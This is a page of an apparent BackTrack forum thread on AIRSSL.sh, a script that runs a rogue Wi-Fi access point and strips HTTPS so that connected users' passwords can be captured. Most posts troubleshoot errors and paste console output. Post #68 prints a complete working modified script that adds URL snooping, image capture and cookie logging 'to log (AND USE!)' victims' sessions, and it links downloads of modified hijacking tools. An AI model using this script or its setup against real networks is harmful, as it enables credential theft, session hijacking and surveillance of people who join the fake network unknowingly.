Page 7 of 9 FirstFirst ... 56789 LastLast
Results 61 to 70 of 88

Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

  1. #61
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    8

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I got error, Cant get IP adress!

    I use Intel 3945ab wireless adapter for receiving internet, and rtl8187 for fake AP...
    Have anyone solution for this prob?

  2. #62
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    8

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    When çi run the script çi get this error after the airbase is trying to configure at0:

    at0: ERROR while getting interface flags: no such device

    I tried both scripts 1.0, 2.0
    I have a rtl8187, internet adap eth0, fake ap wlan0....

    What am I doing wrong?

    thanks!!!

  3. #63
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    2

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hello.
    How can i configure fake ap to use wpa2 key?
    I try to use internet interface a broadband modem(ppp0 interface), but on client i can`t get internet connection. Any walkaround?

  4. #64
    Just burned his ISO FettMaster's Avatar
    Join Date
    Jan 2011
    Posts
    8

    Default Respuesta: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hi, I'm having the next error:

    Code:
    root@bt:~# /root/airssl.sh
    
    AIRSSL 2.0 - Credits killadaninja & G60Jon
    
    0.0.0.0         192.168.2.1     0.0.0.0         UG    0      0        0 eth0
    
    
    Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
    192.168.2.1
    Enter your interface that is connected to the internet, this should be listed above. For example eth1: eth0
    Enter your interface to be used for the fake AP, for example wlan0: wlan0
    Enter the ESSID you would like your rogue AP to be called: Nancy
    
    
    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!
    
    PID     Name
    8976    dhclient
    8995    dhclient
    
    
    Interface       Chipset         Driver
    
    wlan0           RTL8187         rtl8187 - [phy0]
                                    (monitor mode enabled on mon6)
    mon0            RTL8187         rtl8187 - [phy0]
    mon1            RTL8187         rtl8187 - [phy0]
    mon2            RTL8187         rtl8187 - [phy0]
    mon3            RTL8187         rtl8187 - [phy0]
    mon4            RTL8187         rtl8187 - [phy0]
    mon5            RTL8187         rtl8187 - [phy0]
    
    [+] Configuring FakeAP....
    
    Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches?
    
    Choose Y to see airbase-ng help and add switches.
    Choose N to run airbase-ng in basic mode with your choosen ESSID.
    Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
    Y, N or A
    N
    [+] Configuring forwarding tables...
    at0: ERROR while getting interface flags: No such device
    SIOCSIFADDR: No such device
    at0: ERROR while getting interface flags: No such device
    SIOCSIFNETMASK: No such device
    SIOCSIFMTU: No such device
    SIOCADDRT: No such process
    [+] Setting up DHCP...
    [+] Starting sslstrip...
    [+] Configuring ettercap...
    
    Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N
    Y or N
    What can be the problem?

    I have mi wired network in eth0
    My wireless wlan0

    Thanks!

  5. #65
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    8

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Fettmaster I have the same issue....

  6. #66
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    8

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hey noobie here i am having problems with airssl.sh here are the adapters i am using

    wlan0 Atheros ath5k - [phy0]
    ra0 Ralink 2560 PCI rt2500


    the ra0 is an alfa AWUS036nh
    the wlan0 is my internet connection

    here is my problem i have tried to kill the processes using sudo kill ---
    and the just keep popping up with new process numbers also i get the at0 errors seen below if you need any more in pleas let me know

    AIRSSL 2.0 - Credits killadaninja & G60Jon

    0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 wlan0


    Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1:
    192.168.0.1
    Enter your interface that is connected to the internet, this should be listed above. For example eth1: wlan0
    Enter your interface to be used for the fake AP, for example wlan0: ra0
    Enter the ESSID you would like your rogue AP to be called: mine


    Found 3 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    11282 wpa_supplicant
    11291 dhclient
    11356 dhclient
    Process with PID 11282 (wpa_supplicant) is running on interface wlan0
    Process with PID 11356 (dhclient) is running on interface wlan0


    Interface Chipset Driver

    wlan0 Atheros ath5k - [phy0]
    ra0 Ralink 2560 PCI rt2500 (monitor mode enabled)

    [+] Configuring FakeAP....

    Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches?

    Choose Y to see airbase-ng help and add switches.
    Choose N to run airbase-ng in basic mode with your choosen ESSID.
    Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
    Y, N or A
    a

    [+] Starting FakeAP...
    [+] Configuring forwarding tables...
    at0: ERROR while getting interface flags: No such device
    SIOCSIFADDR: No such device
    at0: ERROR while getting interface flags: No such device
    SIOCSIFNETMASK: No such device
    SIOCSIFMTU: No such device
    SIOCADDRT: No such process
    [+] Setting up DHCP...
    [+] Starting sslstrip...
    [+] Configuring ettercap...

  7. #67
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hi all !
    I'm not trying to hijack your thread, but your script inspired me (well, taught me to be more precise) and I made a script of my own, with different means though. It's much simpler and works for local use. I of course gave you credit in the thread that people can find here : http://www.backtrack-linux.org/forum...utomation.html if they're interested !

    Concerning your script I made changes for my own use. For example, why do you use airmon-ng when you could just set your interface to monitor mode ? It worked better for me when using
    Code:
    ifconfig $fakeap_interface down
    iwconfig $fakeap_interface mode monitor
    ifconfig $fakeap_interface up
    I also removed some xwindows that I found to be useless (sslstrip for example).

    Anyway, great work, thanks !

    (Check your PMs) EDIT : or don't, I couldn't send you one due to your box over load I sent it to your "visitor messages"
    Last edited by comaX; 02-06-2011 at 04:01 PM.

  8. #68
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    9

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    ::EDIT::

    I messed around a bit with this original scripting and added the option for URL snarf as well as using hamster / ferret to autolog cookies. It works locally, haven't tested it on other machines.

    Here's the pastebin: http://pastebin.com/JxkdHuH6

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - Modified again by EODtech on backtrack-linux.org
    # airssl.sh - v1.0
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    
    # Network questions
    echo
    echo "AIRSSL 2.0 - Credits killadaninja & G60Jon  "
    echo
    route -n -A inet | grep UG
    echo
    echo
    echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
    read -e gatewayip
    echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
    read -e internet_interface
    echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
    read -e fakeap_interface
    echo -n "Enter the ESSID you would like your rogue AP to be called: "
    read -e ESSID
    airmon-ng start $fakeap_interface
    fakeap=$fakeap_interface
    fakeap_interface="mon0"
    
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet 10.0.0.0 netmask 255.255.255.0 {
    option routers 10.0.0.1;
    option subnet-mask 255.255.255.0;
    
    option domain-name "\"$ESSID\"";
    option domain-name-servers 10.0.0.1;
    
    range 10.0.0.20 10.0.0.50;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    echo
    echo "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches? "
    echo
    echo "Choose Y to see airbase-ng help and add switches. "
    echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. "
    echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
    echo "Y, N or A "
     
    
    read ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    fi
    
    if [ $ANSWER = "y" ] ; then
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring forwarding tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    
    # DHCP
    echo "[+] Setting up DHCP..."
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Sslstrip
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k & sslstripid=$!
    sleep 2
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    echo "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose N "
    echo "Y or N "
    read ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redifined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # URLSnarf
    echo
    echo "[+] URLSnarf?"
    echo
    echo "Would you also like to start URL Snarf to see what webpages are being pulled up or something?"
    echo "Y or N"
    read URLSN
    if [ $URLSN = "y" ] ; then
    echo
    echo "[+] Starting URLSnarf..."
    xterm -geometry 75x20+1+500 -T URLSnarf -bg white -fg black -e urlsnarf -i at0 & urlsnid=$!
    sleep 3
    fi
    
    #Impliment Ferret / Hamster for cookies!!!
    echo
    echo "[+] Hamster / Ferret?"
    echo
    echo "Would you like to start Hamster / Ferret to log (AND USE!) the vicim's cookies?"
    echo
    echo "BE SURE TO HAVE YOUR INTERNET COOKIES CLEARED, AND A PROXY MANUALLY SET TO 127.0.0.2 PORT 1233"
    echo 
    echo "Then just visit http://hamster and set interface to eth0 or what ever you supplied for your internet facing connection :)"
    echo
    echo "NOTE:  Cookies will be logged, however they will all show up under your local IP address"
    echo "Y or N"
    read HAMSTER
    if [ $HAMSTER = "y" ] ; then
    echo
    echo "[+] Starting Hamster / Ferret..."
    xterm -geometry 75x10+500+0 -T Ferret -bg white -fb black -e /root/moddedhamster/ferret -i $internet_interface & ferretid=$!
    sleep 1
    xterm -geometry 75x10+500+100 -T Hamster -bg white -fb black -e /root/moddedhamster/hamster & hamsterid=$!
    sleep 3
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    echo "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), "
    echo "Y or N "
    read DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo "After you have finished please close airssl and clean up properly by hitting Y,
    if airssl is not closed properly ERRORS WILL OCCUR "
    read WISH
    
    # Clean up
    if [ $WISH = "y" ] ; then
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    kill ${urlsnid}
    kill ${ferretid}
    kill ${hamsterid}
    
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    exit
    
    fi
    exit


    Keep in mind that you need to use my modified versions of hamster because for some reason the hamster port was showing up as in use, so I changed the default ip and port #. Just extract the tar to it's default folder in /root/ so they would be accessible at /root/moddedhamster/ferret -i eth0 for example. (download them here: http://www.mediafire.com/?7b12zu28185e1wp ) The instructions for hamster will show up when you get to that point.

    Note to OP: If this is against your wishes in anyway, let me know and i'll pull the post.

    -Adam

  9. #69
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    1

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quick question. I have been trying this script over the weekend and wondered if anyone has any luck with the following scenario. I have my laptop with wlan0 and wlan1 each work in monitor mode/ injection mode. wlan1 is a alfa card wlan0 is the internal wireless intel wireless n 1000. But what happens when I run the script is I use my windows computer to test to see if it is capturing information and I cant see the network I am broadcasting from wlan1 and I can not longer access the network I am connected to on wlan0 although I can still browse from the machine running the script. Am I too hopeful that this can all be done wirelessly? Or does anyone see any inherent failures in my description here. The script appears to start and run correctly just no networks. Are you supposed to shut down the other wireless and just use the ethernet?

  10. #70
    Just burned his ISO
    Join Date
    Feb 2011
    Posts
    1

    Thumbs up Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Let me say I'm quite impressed with this little one. Here's my experience with it:
    Running Macosx 10.6.6 on 13" Aluminium Unibody Macbook with the following config:
    VM software: VirtualBox 4.0.4
    BT: BT 4 Final
    Internal Airport Wireless: Used for internet access to my home's AP
    External USB Encore Wireless Dongle: FakeAP
    In order to make it work I had to make some minor changes to what I thought would be a straightforward thing.
    1) On the VM, instead of setting the interface as NAT, had to set it as Bridged so it directly connected with my network.
    2) Had to pass control of the USB Wireless Dongle to the VM(obviously)
    3) If I started the script after starting interfaces (/etc/init.d/networking start) this happened:

    Code:
    PID     Name
    5024    dhclient3
    5130    dhclient3
    Process with PID 5130 (dhclient3) is running on interface wlan0
    And DHCP wouldn't work for victims.
    So in order to get it working, had to issue "killall dhclient3" prior to starting the script.

    After this, it worked pretty good, the only problem is that I found it slow and unstable, I'm not sure if I should blame this cheap USB card or the script

    What I still don't find how to fix is after I stop the script by pressing "y" when I want to rerun it it simply won't work. I guess all the housekeeping is not done there, any thoughts?

    Once again I'd like to thank killadaninja for this nifty script.

Page 7 of 9 FirstFirst ... 56789 LastLast

Similar Threads

  1. Replies: 44
    Last Post: 04-08-2011, 02:30 AM
  2. Replies: 6
    Last Post: 10-08-2010, 11:40 PM
  3. sslstrip with ettercap or airspoof not capturing password
    By danielgc in forum OLD BackTrack 4 General Support
    Replies: 3
    Last Post: 08-29-2009, 10:29 PM
  4. Capturing passwords on a big LAN!
    By dxi5t in forum OLD Pentesting
    Replies: 5
    Last Post: 06-10-2008, 05:05 PM
  5. Wifiopn-cap: automated OPN Network capturing script
    By teknecal in forum OLD Tutorials and Guides
    Replies: 2
    Last Post: 04-21-2008, 01:39 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •